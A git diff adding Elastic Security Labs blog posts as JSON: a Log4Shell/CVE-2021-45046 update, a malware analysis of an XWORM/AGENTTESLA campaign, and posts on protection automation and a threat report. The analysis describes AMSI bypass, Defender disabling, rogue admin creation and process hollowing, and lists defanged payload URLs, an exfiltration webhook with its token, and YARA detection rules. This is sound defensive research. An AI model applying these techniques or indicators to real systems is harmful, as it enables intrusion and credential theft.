+ "document": "---\ntitle: \"Analysis of Log4Shell vulnerability & CVE-2021-45046\"\nslug: \"analysis-of-log4shell-cve-2021-45046\"\ndate: \"2022-11-30\"\ndescription: \"In this post, we cover next steps the Elastic Security team is taking for users to continue to protect themselves against CVE-2021-44228, or Log4Shell.\"\nauthor:\n - slug: jake-king\nimage: \"photo-edited-12-e.jpg\"\ncategory:\n - slug: security-research\n - slug: vulnerability-updates\n---\n\n> _To understand how Elastic is currently assessing internal risk of this vulnerability in our products please see the advisory_[_here._](https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476)\n>\n> _This document was updated on December 17, 2021 to reflect a revised CVSS score for CVE-2021-45046, and new findings by the community._\n\nIn recent days Log4Shell, or CVE-2021-44228, has dominated the news cycle in the world of information security and beyond. Elastic released an [advisory](https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476?ultron=log4js-exploit&blade=announcement&hulk=email&mkt_tok=ODEzLU1BTS0zOTIAAAGBU8N1ZUOwzTcRbJCOiByHmeYiopMnarq-QPWBIyhPI3Vvsp6w-4q4PBbTGZ3fZ0sB75cpaUdOddA1k-6-yh3QwAicvJTgafdJWv_-9Cn2GoKLvsmt) detailing how Elastic products and users are impacted, and a [blog](https://www.elastic.co/blog/detecting-log4j2-with-elastic-security?ultron=log4js-exploit&blade=announcement&hulk=email&mkt_tok=ODEzLU1BTS0zOTIAAAGBU8N1ZDYRbFq2QZ4ZK8tc2IbDatArsdI6WGcA2M90g4v02svJeqCXFeZ23R4TjeYii4KBGAkqMBgWc5IkxYrmefgwZBanjGQh8v66drUymiVSQFvs) post describing how our users can leverage Elastic Security to help defend their networks.\n\nMany readers have further questions as to how we’re tracking this issue within Elastic Security, what our coverage is now, and what we’re expecting to do next. This post outlines a few details for our current status, and provides details regarding a new, related vulnerability: CVE-2021-45046.\n\n## Elastic Security response\n\nAs you may imagine, the team has worked tirelessly to ensure that we’re developing detections for both active exploitation of the vulnerability, as well as post-compromise indicators, and will continue active development until further notice.\n\nWe’re spending time focusing on detailed detections that better align with some of the emerging trends that adversaries are now taking advantage of as they have time to develop their attack strategies. And we’re not working in silence — those that may have had a chance to catch up on our [original post](https://www.elastic.co/blog/detecting-log4j2-with-elastic-security) a few days ago will be pleasantly surprised we’ve added further detections and hunting examples, and will continue to do so as we learn more with the community.\n\nAlongside the threat research and signature development, we’ve noted some interesting observations:\n\n- We noted several instances of [generic crypto miners](https://www.virustotal.com/gui/file/5b25db204b5cd5cc3193f4378dd270dced80da9d39874d8b6fdd75e97d2cc907/detection) for Linux being deployed that appeared to be related to exploitation of this CVE, but determined that they are benign true positives\n- We’ve stopped at least eight different families of malware being deployed using the log4j exploit, indicating widespread adoption of the exploit by threats of all kinds\n- While we are observing coverage across our full protection suite (such as behavior protection), it is noteworthy that our free basic-tier malware protection is successfully preventing initial access\n\nWe will aim to keep users and readers apprised of findings, and hope to share additional observations in the wild as we see them.\n\n## A new contender: CVE-2021-45046\n\nWhile we watch the CVE-2021-44228 (Log4Shell) vulnerability dominate the news cycles, a new contender, [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046), was accidentally introduced to Log4j2j version 2.15.0, allowing adversaries to invoke a Denial of Service, and a remote code execution condition through specially crafted payloads. Previous mitigations to avoid Information Disclosure vulnerabilities by setting the `log4j2.noFormatMsgLookup` state to `true` do not mitigate against this new finding, according to the CVE details.\n\nWhile initially CVE-2021-45046 carried a lower CVSS score of 3.7 due to the impact of the initially discovered condition that can be invoked, this was re-evaluated to a 9.0 indicating limited remote code execution was possible. The finding was shared on December 16, 2021 by [Alvaro Muñoz](https://twitter.com/pwntester/status/1471465662975561734), who identified that while the default setting formatMsgNoLookups was accurately set to true, there were alternative locations for lookups to take place. Technical details are still unfolding from the community, however the Log4j2 team shared the following message within their security updates:\n\n_The reason these measures are insufficient is that, in addition to the Thread Context attack vector mentioned above, there are still code paths in Log4j where message lookups could occur: known examples are applications that use Logger.printf(\"%s\", userInput), or applications that use a custom message factory, where the resulting messages do not implement StringBuilderFormattable. There may be other attack vectors._\n\n_The safest thing to do is to upgrade Log4j to a safe version, or remove the JndiLookup class from the log4j-core jar._ [_Reference here_](https://logging.apache.org/log4j/2.x/security.html)\n\nGiven this new information, and readily available[POCs](https://twitter.com/marcioalm/status/1471740771581652995) available for exploitation, the Apache team has recommended those impacted upgrade to the latest, safe version of Log4j2, or alternatively remove the JndiLookup class from the log4j-core jar.\n\nElastic Security has observed many threat actors and benign scanners leveraging this new methodology already in some edge environments, with payloads incorporating previous attack methodologies such as key extraction attempts and base64 encoded payloads:\n\n\n\nWe anticipate adding further details as we learn them, and thank the team at lunasec specifically for providing a [detailed, early summary](https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/) of this emerging situation, and of course, provide kudos to [Alvaro Muñoz](https://twitter.com/pwntester) of Github Security Lab for the findings.\n\n## Thank you (again!), from Elastic Security\n\nWe want to thank all of the security teams across the globe for your tireless work this week. As we referenced before, openness and collaboration in the security community to safeguard all users is paramount when facing such a serious and pervasive vulnerability.\n\nExisting Elastic Security users can access these capabilities within the product. If you’re new to Elastic Security, take a look at our [Quick Start guides](https://www.elastic.co/training/elastic-security-quick-start) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals).\n\nGet started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration). Or [download](https://www.elastic.co/downloads/) the self-managed version of the Elastic Stack for free.\n\n### References\n\n[https://logging.apache.org/log4j/2.x/security.html](https://logging.apache.org/log4j/2.x/security.html)\n\n[https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/](https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/)\n"
+ },
+ "title": "Analysis of Log4Shell vulnerability & CVE-2021-45046",
+ "slug": "analysis-of-log4shell-cve-2021-45046",
+ "date": "2022-11-30",
+ "description": "In this post, we cover next steps the Elastic Security team is taking for users to continue to protect themselves against CVE-2021-44228, or Log4Shell.",
+ "author": [
+ {
+ "slug": "jake-king"
+ }
+ ],
+ "image": "photo-edited-12-e.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "vulnerability-updates"
+ }
+ ]
+ },
+ "id": "security_labs_content-analysis_of_log4shell_cve_2021_45046-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-attack_chain_leads_to_xworm_and_agenttesla-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-attack_chain_leads_to_xworm_and_agenttesla-md.json
new file mode 100644
index 00000000000..11e56371953
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-attack_chain_leads_to_xworm_and_agenttesla-md.json
@@ -0,0 +1,31 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Attack chain leads to XWORM and AGENTTESLA\"\nslug: \"attack-chain-leads-to-xworm-and-agenttesla\"\ndate: \"2023-04-10\"\ndescription: \"Our team has recently observed a new malware campaign that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into clicking on the documents, which appear to be legitimate.\"\nauthor:\n - slug: salim-bitam\nimage: \"blog-thumb-coin-stacks.jpg\"\ncategory:\n - slug: attack-pattern\n - slug: malware-analysis\ntags:\n - xworm\n - agenttesla\n---\n\n## Key Takeaways\n\n- Threat actors are deploying known malware using their own custom .NET loaders\n- The threat actors employ simple and well-known tactics such as bypassing AMSI through patching and a basic custom .NET loader\n- The threat actors are abusing legitimate free file hosting services\n\n## Preamble\n\nOur team has recently observed a new malware campaign that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into clicking on the documents, which appear to be legitimate, but are in fact fake, the adversary leverages weaponized word documents to execute malicious PowerShell scripts, and also utilizes a custom obfuscated .NET loader to load various malware strains, including XWORM and AGENTTESLA.\n\n## RTF loader code analysis\n\n### Overview\n\nDuring a recent investigation, we discovered a malicious word document named `Card & Booking Details.docx`. This document has been designed with the intent to deceive the victim and includes two falsified scanned documents, namely a credit card and a passport.\n\nUpon opening the document, an RTF object hosted at `www.mediafire[.]com/file/79jzbqigitjp2v2/p2.rtf` is fetched.\n\nThis RTF object contains a macro-enabled Excel object. When opened, this macro downloads an obfuscated powerShell script which in turn deploys different malware families.\n\nAt the time of this writing, we have observed two distinct malware families, namely XWORM and AGENTTESLA, have been deployed through this execution chain. Both malware families mentioned above are loaded into the compromised system's memory by the same custom .NET loader. Once loaded, the malicious payload can carry out a range of functions, such as stealing sensitive data and executing commands on the compromised system.\n\n\n\nIn this research post, we will walk through the initial execution of the malware and detail the capabilities we discovered.\n\n### Extracting the malicious VBA\n\nThe RTF document contains multiple embedded objects, including an interesting one that caught our attention: `Excel.SheetMacroEnabled`.\n\n\n\nWe can use [`rtfdumpy.py`](https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py), a script developed by Didier Stevens to analyze RTF files, to dump the object and [`olevba.py`](https://www.decalage.info/python/olevba), a script developed by Philippe Lagadec, to extract any embedded VBA scripts from an [OLE](https://en.wikipedia.org/wiki/Object_Linking_and_Embedding) object. The extracted VBA script shown below downloads and executes a malicious powershell script from `https://www.mediafire[.]com/file/xnqxmqlcj51501d/7000m.txt/file`.\n\n\n\n### Powershell script analysis\n\nThe malicious PowerShell script is obfuscated using string substitution to evade detection and make analysis more difficult.\n\n\n\nIt contains additional powershell script blocks in hex format that will be deployed in the infected machine designed to prepare the environment by setting up persistence, bypassing AMSI, disabling Windows defender and creating a mechanism to update the malware. The ultimate objective is to install two .NET binaries, namely a loader and a payload (XWORM / AGENTTESLA).\n\n### Deleting the malicious document\n\nThe malware starts by deleting the original Word document, first killing the process `Winword.exe` and then deleting all .DOCX files located in the default `Downloads` and `Desktop` folders of every user. This initial step shows the malware's destructive nature and how it can potentially harm the user's data.\n\n\n\n### Persistence\n\nThe malware creates a directory in the path `C:\\ProgramData\\MinMinons` , which is used to store other Powershell scripts and binaries. The currently running Powershell script is then copied to `C:\\ProgramData\\MinMinons\\Candlegraphy.\\_\\_\\_`.\n\nNext, the malware deobfuscates the first embedded Powershell script which is used to create persistence. It first writes a JScript file that invokes the original Powershell script saved in `C:\\ProgramData\\MinMinons\\Candlegraphy.\\_\\_\\_` through the activeXObject shell, then a scheduled task named “MOperaChrome” is created to run the JScript file using the Microsoft signed [Windows Script Host (WSH) utility](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wscript), `wscript.exe`.\n\n\n\n### AMSI bypass\n\nThe second embedded powershell script is responsible for bypassing AMSI by patching the `amsiInitFailed` flag. In doing so, the initialization of AMSI fails, leading to the prevention of any scan being initiated for the ongoing process. Furthermore, the PowerShell script proceeds to disable the Microsoft Windows Defender service.\n\n\n\n### User creation\n\nThe script creates a local administrator account named “System32” and adds it to the Remote Desktop Users group. This enables the attacker to log in via Remote Desktop Protocol (RDP). Next, the script disables the machine's firewall to allow inbound RDP connection attempts which aren’t filtered by edge controls.\n\n\n\n### Malware update persistence\n\nThe third embedded script stores a secondary JScript file, whose purpose is downloading a revised or updated version of the malware. This file is saved to a predetermined location at `C:\\ProgramData\\MinMinons\\miguan.js`. Furthermore, a scheduled task with the name (“miguaned”) is created to execute the JScript file through `wscript.exe` , similar to the previously described task.\n\nThe JScript creates an instance of `WScript.Shell` object by calling ActiveXObject with the following CLSID `{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}` which corresponds to Shell Object, then downloads from the URL `https://billielishhui.blogspot[.]com/atom.xml` the update powershell malware.\n\n\n\n### .NET loader\n\nThe custom DOTNET loader employs the [P/INVOKE technique](https://learn.microsoft.com/en-us/dotnet/standard/native-interop/pinvoke) to call the native Windows API and inject a payload into a signed microsoft binary via [process hollowing](https://attack.mitre.org/techniques/T1055/012/).\n\nThe loader’s code employs various obfuscation techniques to hinder analysis, including the use of dead instruction, renamed symbols to make the code less readable and more confusion and encoded strings. Fortunately a tool like [de4dot](https://github.com/de4dot/de4dot) can be used to output a human-readable version of it.\n\n\n\nThe malware leverages the `LoadLibrary` and `GetProcAddress` APIs to access the required Windows APIs. To obscure the names of these APIs, the loader stores them in an encoded format within the binary file, utilizing a sequence of substitution and string reversal methods.\n\n\n\nThe loader then starts a process in a suspended state using `CreateProcessA` API. The following is the list of executables it uses as a host for it’s malicious code:\n\n- `C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe`\n- `C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe`\n- `C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe`\n\nThese binaries are signed and trusted by the system and can evade detection by security software that relies on whitelisting system processes. It then uses `Zwunmapviewofsection` to unmap the memory of the target process, writes the payload to the suspended process and then resume the thread using `ResumeThread` API.\n\n### Final payload\n\nDuring our research we discovered that the threat actor has been deploying different payloads. Namely, we observed 2 families: XWORM and AGENTTESLA.\n\nXWORM has gained notoriety in the underground criminal marketplace due to its ability to employ sophisticated capabilities like virtualization and sandbox detection, used to avoid detection and support persistence within an infected system.\n\nOf particular concern is the fact that XWORM is readily available on the internet as a cracked version, with version 2.1 being especially prevalent. This highlights the dangers of underground cybercrime markets and the ease with which malicious actors can access and utilize powerful tools.\n\nTwo different versions of the XWORM family were observed versions 2.2 and 3.1. The following is the configuration of a XWORM sample in plain text.\n\n\n\nAGENTTESLA is a trojan and credential stealer written in .NET. While it first emerged in 2014, it is now among the most active and malicious software. AGENTTESLA is affordably priced and includes support from the developers, making it easily accessible to cybercriminals with limited technical skills.\n\nThe sample we analyzed was heavily obfuscated, masqueraded as an AVG installer,and leverages discord for C2. It uploads stolen information to the attacker’s Discord channel via the following webhook: `https://discord[.]com/api/webhooks/1089956337733087274/uYNA_D8Ns1z9NZ3B1mGp0XXyGq-785KLGIfEAZsrz3TJd5fvOjXA927F7bUTTzbNT6Zk`.\n\n\n\n\n\n## Observed adversary tactics and techniques\n\nElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that threats use.\n\n## Tactics\n\nTactics represent the “why” of a technique or sub-technique. They represent the adversary’s tactical goals: the reason for performing an action.\n\n- [Initial access](https://attack.mitre.org/tactics/TA0001)\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Persistence](https://attack.mitre.org/tactics/TA0003)\n- [Command and control](https://attack.mitre.org/tactics/TA0011)\n- [Defense evasion](https://attack.mitre.org/tactics/TA0005)\n\n## Techniques/subtechniques\n\nTechniques and Subtechniques represent how an adversary achieves a tactical goal by performing an action.\n\n- [Process injection](https://attack.mitre.org/techniques/T1055/)\n- [Indicator removal: File deletion](https://attack.mitre.org/techniques/T1070/004/)\n- [Scheduled task/job: Scheduled task](https://attack.mitre.org/techniques/T1053/005/)\n- [User Execution: Malicious File](https://attack.mitre.org/techniques/T1204/002/)\n- [Phishing: Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001/)\n- [Command and Scripting Interpreter: Powershell](https://attack.mitre.org/techniques/T1059/003/)\n- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)\n- [Impair Defenses: Disable or Modify Tools](https://attack.mitre.org/techniques/T1629/003/)\n- [Create Account](https://attack.mitre.org/techniques/T1136/)\n\n## Detection logic\n\n### YARA\n\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify XWORM and [AGENTTESLA](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_AgentTesla.yar) malware families.\n\n```\nrule Windows_Trojan_Xworm_732e6c12 {\nmeta:\n author = \"Elastic Security\"\n id = \"732e6c12-9ee0-4d04-a6e4-9eef874e2716\"\n fingerprint = \"afbef8e590105e16bbd87bd726f4a3391cd6a4489f7a4255ba78a3af761ad2f0\"\n creation_date = \"2023-04-03\"\n last_modified = \"2023-04-03\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Xworm\"\n threat_name = \"Windows.Trojan.Xworm\"\n source = \"Manual\"\n maturity = \"Diagnostic\"\n reference_sample = \"bf5ea8d5fd573abb86de0f27e64df194e7f9efbaadd5063dee8ff9c5c3baeaa2\"\n scan_type = \"File, Memory\"\n severity = 100\n\nstrings:\n $str1 = \"startsp\" ascii wide fullword\n $str2 = \"injRun\" ascii wide fullword\n $str3 = \"getinfo\" ascii wide fullword\n $str4 = \"Xinfo\" ascii wide fullword\n $str5 = \"openhide\" ascii wide fullword\n $str6 = \"WScript.Shell\" ascii wide fullword\n $str7 = \"hidefolderfile\" ascii wide fullword\ncondition:\n all of them}\n\nrule Windows_Trojan_AgentTesla_d3ac2b2f {\nmeta:\n author = \"Elastic Security\"\n id = \"d3ac2b2f-14fc-4851-8a57-41032e386aeb\"\n fingerprint = \"cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc\"\n creation_date = \"2021-03-22\"\n last_modified = \"2022-06-20\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"AgentTesla\"\n threat_name = \"Windows.Trojan.AgentTesla\"\n source = \"Manual\"\n maturity = \"Diagnostic, Production\"\n reference_sample = \"65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4\"\n scan_type = \"File, Memory\"\n severity = 100\n\nstrings:\n $a1 = \"GetMozillaFromLogins\" ascii fullword\n $a2 = \"AccountConfiguration+username\" wide fullword\n $a3 = \"MailAccountConfiguration\" ascii fullword\n $a4 = \"KillTorProcess\" ascii fullword\n $a5 = \"SmtpAccountConfiguration\" ascii fullword\n $a6 = \"GetMozillaFromSQLite\" ascii fullword\n```\n"
+ },
+ "title": "Attack chain leads to XWORM and AGENTTESLA",
+ "slug": "attack-chain-leads-to-xworm-and-agenttesla",
+ "date": "2023-04-10",
+ "description": "Our team has recently observed a new malware campaign that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into clicking on the documents, which appear to be legitimate.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "blog-thumb-coin-stacks.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ },
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "xworm",
+ "agenttesla"
+ ]
+ },
+ "id": "security_labs_content-attack_chain_leads_to_xworm_and_agenttesla-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-automating_security_protections_rapid_response_to_malware-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-automating_security_protections_rapid_response_to_malware-md.json
new file mode 100644
index 00000000000..d1bf583c46a
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-automating_security_protections_rapid_response_to_malware-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Automating the Security Protections rapid response to malware\"\nslug: \"automating-security-protections-rapid-response-to-malware\"\ndate: \"2023-03-01\"\ndescription: \"See how we’ve been improving the processes that allow us to make updates quickly in response to new information and propagate those protections to our users, with the help of machine learning models.\"\nauthor:\n - slug: samantha-zeitlin\nimage: \"blog-security-endpoint-720x420.png\"\ncategory:\n - slug: machine-learning\n - slug: detection-science\n---\n\nCyber attacks on corporate networks were [up 50% in 2021](https://www.forbes.com/sites/chuckbrooks/2022/01/21/cybersecurity-in-2022--a-fresh-look-at-some-very-alarming-stats/?sh=675676ea6b61), and it’s [expected that 2022 will see more of the same](https://www.govtech.com/blogs/lohrmann-on-cybersecurity/the-top-22-security-predictions-for-2022). [Elastic Endpoint Security](https://www.elastic.co/endpoint-security/) includes a variety of protection layers to ensure maximum coverage against different types of malware. There have been a few examples recently of the need for [fast, accurate updates](https://www.elastic.co/blog/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper) of user environments in order to protect against the latest malware. Here at Elastic, we’ve been improving the processes that allow us to make updates quickly in response to new information and propagate those protections to our users.\n\nAs part of our security solution, we use a machine learning model to help us detect malware based on known characteristics. Since machine learning is never perfect, we deploy supplemental artifacts, including lists of known file hashes that range from malicious to benign. There are two scenarios when we might need to update these lists, which we’ll cover here. Using these, teams can experience a much faster response to malware.\n\n[Related article: [Sandboxing anti-malware products for fun and profit](https://www.elastic.co/blog/sandboxing-anti-malware-products-for-fun-and-profit)]\n\n## Scenario 1: The model isn’t perfect\n\nThis happens pretty rarely, since our model has True Negative rates of 99.8%. But no model is perfect, and our True Positive rates vary from 99% (which is great) down to 97.9%, due to noisy data — particularly large bursts of near-duplicates. In applying machine learning to cybersecurity, data drift is an ever-present challenge and part of what makes it such an interesting problem.\n\nThere are a couple of ways we can find out if our model is doing the wrong thing:\n\n1. **User feedback.**\n\nA user sends us an email telling us that a piece of custom software is being flagged as malware, but is actually safe.\n\n2. **Telemetry data coming back from our model running on customers’ machines.**\n\nWe look at the volume and velocity of alerts, using Elastic’s Anomaly Detection feature to let us know if there is a sudden spike from a particular file. We also use patterns to help us confirm if an alert is coming from a single noisy machine, a test cluster, or a legitimate threat.\n\nThe advantage of using lists as a backstop to machine learning is that it’s a fast and easy way to make sure our customers are protected from new malware, as well as protecting them from unnecessary noise from false positives.\n\n## Scenario 2: New forms of malware appear\n\nWe typically find out about new kinds of malware from either security news/community resources, or our own Security Intelligence and Analytics team identifying new kinds of malware.\n\nWhen this happens, we can easily deploy small changes to lists. We update the model separately, because that takes longer.\n\nWe’ve been steadily adding more automation to make this process of deploying updated lists to customers smoother and faster, with the goal of making it easy for anyone on the team to create and deploy an update. We’ve also been working on making the process of updating the model easier and faster.\n\n## Threats yet discovered…\n\nThe Elastic Security Intelligence and Analytics team continues to research and respond to groundbreaking threats in its mission to help Elastic customers and the broader security community. If you’re using [Elastic Security](https://www.elastic.co/security?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=elastic+security) already, you can expect to see our latest findings in the newsfeed within the platform. We’ll also post our latest findings on [elastic.co/blog](https://www.elastic.co/blog).\n\nReady to become part of the Elastic Security community and take advantage of the team’s leading threat research? Get started with a free [14-day trial of Elastic Cloud](https://cloud.elastic.co/registration?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=trail) or [download](https://www.elastic.co/downloads/?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=download) the self-managed version of the Elastic Stack for free.\n"
+ },
+ "title": "Automating the Security Protections rapid response to malware",
+ "slug": "automating-security-protections-rapid-response-to-malware",
+ "date": "2023-03-01",
+ "description": "See how we’ve been improving the processes that allow us to make updates quickly in response to new information and propagate those protections to our users, with the help of machine learning models.",
+ "author": [
+ {
+ "slug": "samantha-zeitlin"
+ }
+ ],
+ "image": "blog-security-endpoint-720x420.png",
+ "category": [
+ {
+ "slug": "machine-learning"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ]
+ },
+ "id": "security_labs_content-automating_security_protections_rapid_response_to_malware-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-behind_the_scenes_global_threat_report-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-behind_the_scenes_global_threat_report-md.json
new file mode 100644
index 00000000000..e1167adee8b
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-behind_the_scenes_global_threat_report-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Behind the scenes: The making of a Global Threat Report\"\nslug: \"behind-the-scenes-global-threat-report\"\ndate: \"2022-11-30\"\ndescription: \"What was our approach and process for creating a global threat report?\"\nauthor:\n - slug: mark-dufresne\nimage: \"gtr-blog-image-720x420.jpg\"\ncategory:\n - slug: reports\n---\n\nThe first [Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) was published earlier this week. In it, you will learn about trends observed by our threat researchers, our predictions for what’s coming next, and some of our recommendations to operate securely in the face of today’s and tomorrow’s threats. If you haven’t read it yet, go [check it out](https://www.elastic.co/explore/security-without-limits/global-threat-report).\n\nAs a technical leader in [Elastic Security](http://www.elastic.co/security), I'd like to reveal a small amount about what goes into reports like this one and why it’s significant.\n\n## Why did we do it?\n\nIf you didn’t already know this, you know it now: Elastic is a security company. We are also different — we’re open and transparent. We share exactly how our detections and preventions work in the [protections-artifacts](https://github.com/elastic/protections-artifacts) and [detection-rules](https://github.com/elastic/detection-rules) repos. We’ve launched [Elastic Security Labs](https://www.elastic.co/security-labs/) and regularly publish our research, discoveries, and tools. Anyone can spin up a [trial](https://cloud.elastic.co/registration) and try all our features — no barriers, no sales BS. This report is another way we’re bringing transparency to you. We want to empower you by sharing what we know and what we think is coming, and we will continue to expand the scope of what we share in the coming months.\n\n## How'd we do it?\n\nPut simply, by analyzing a vast amount of data. Behind [Elastic Security Labs](http://www.elastic.co/security-labs) is a large team of malware and intelligence analysts, security engineers, researchers, data scientists, and other experts. This team builds and maintains all the protection features in Elastic’s security products: blocking malware, in-memory threats, ransomware, and other malicious behaviors. You name it, we do it. To do this effectively, we need visibility into how our features perform and what threats they’re coming in contact with. We get that visibility through anonymous telemetry shared with us by our users (as well as through research our team carries out on threat feeds and other public datasets).\n\nOur researchers are in the telemetry data daily. Usually, we are focused on the performance of particular features, eliminating false positives and adding protection against emergent techniques, some of which you can learn about in our [threat report](https://www.elastic.co/explore/security-without-limits/global-threat-report). This battle never ends, and we don’t anticipate that changing any time soon.\n\n## Why now?\n\nAs our user base rapidly grew over the past year, we came to the conclusion that we now observe a significant percentage of all threats. Upon hitting that critical mass, we decided to peel off some of our best researchers to zoom out, analyze the totality of what we’ve seen, and determine if we had a story worth sharing. We felt we probably had something to contribute to the community’s collective understanding of the threat landscape, and as you read the report, we hope you agree that we were right to think that.\n\n## Diving deeper\n\nWith that backdrop, I can share a bit more about how a report like this comes to be. Under the leadership of [Devon Kerr](https://twitter.com/_devonkerr_), we built an eight-week plan to analyze and summarize the telemetry coming in from our various features. All our event telemetry data lives in Elasticsearch, which makes for straightforward summarization and visualization.\n\nData normalization was a significant challenge. This included filtering out excessively noisy endpoints so results aren’t skewed, ignoring data from test clusters, ignoring alerts for data which we later realized were false positives, pulling together signals from our full [Elastic Security](http://www.elastic.co/security) solution, and more. It wasn’t the most glamorous work in the world, but it was foundational to producing meaningful results at the end. We’ll plan for a couple weeks in this phase again next time — it will always be a significant lift.\n\nOnce the data was in good shape, we extracted the meaning from raw aggregations of a massive number of events to determine insights worth sharing, which help us understand the present state of the threat landscape. In particular, we wanted to explain the most prevalent threats we're seeing and put them in context. These are patterns that ebb and flow throughout the year, making an annual overview particularly useful for spotting the threats making the biggest impact. This led to the various charts and statistics laid out in the report. It took us a couple weeks to settle on a list among the team.\n\nNext, we had to write. Devon, [Andy Pease](https://twitter.com/andythevariable), [Daniel Stepanic](https://twitter.com/DanielStepanic), and [Terrance DeJesus](https://twitter.com/_xDeJesus) did the heavy lifting here. Anyone who’s done technical writing knows how important clarity and conciseness are in delivering a message that can be understood by the general public. A few dozen pages came together in a way we’re proud of. Importantly, we partnered closely with [Dhrumil Patel](https://www.linkedin.com/in/pateldhrumil/), our product management lead, and [Jen Ellard,](https://twitter.com/jellard8) security product marketing lead, for the [Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) effort to make sure our points were clear and meaningful to our user base.\n\nAll of that brought us to the end of our eight week plan to develop the report. By late August, we were largely pencils-down on the content but far from done. We’re lucky to have a team of designers at Elastic to help us transform a wall of text in a Google doc into a PDF with style and graphics to enhance meaning and help our conclusions and recommendations jump off the page. We knew that this process would take time, many drafts, and a lot of back and forth. Planning and executing this piece of the project took about as long as the data gathering, analysis, and writing. We learned a lot about how long it takes to go from completed draft to final copy and will involve our internal partners early and often in the process.\n\n## Tell us what you think\n\nWe’d love to hear your feedback about the first [Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report). More is on the way. We expect to make this an annual publication, and between now and then we’re hoping to deliver a more interactive version of this inaugural report.\n"
+ },
+ "title": "Behind the scenes: The making of a Global Threat Report",
+ "slug": "behind-the-scenes-global-threat-report",
+ "date": "2022-11-30",
+ "description": "What was our approach and process for creating a global threat report?",
+ "author": [
+ {
+ "slug": "mark-dufresne"
+ }
+ ],
+ "image": "gtr-blog-image-720x420.jpg",
+ "category": [
+ {
+ "slug": "reports"
+ }
+ ]
+ },
+ "id": "security_labs_content-behind_the_scenes_global_threat_report-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-betting_on_bots-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-betting_on_bots-md.json
new file mode 100644
index 00000000000..316472bc663
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-betting_on_bots-md.json
@@ -0,0 +1,37 @@
+{
+ "attributes": {
+ "raw": {
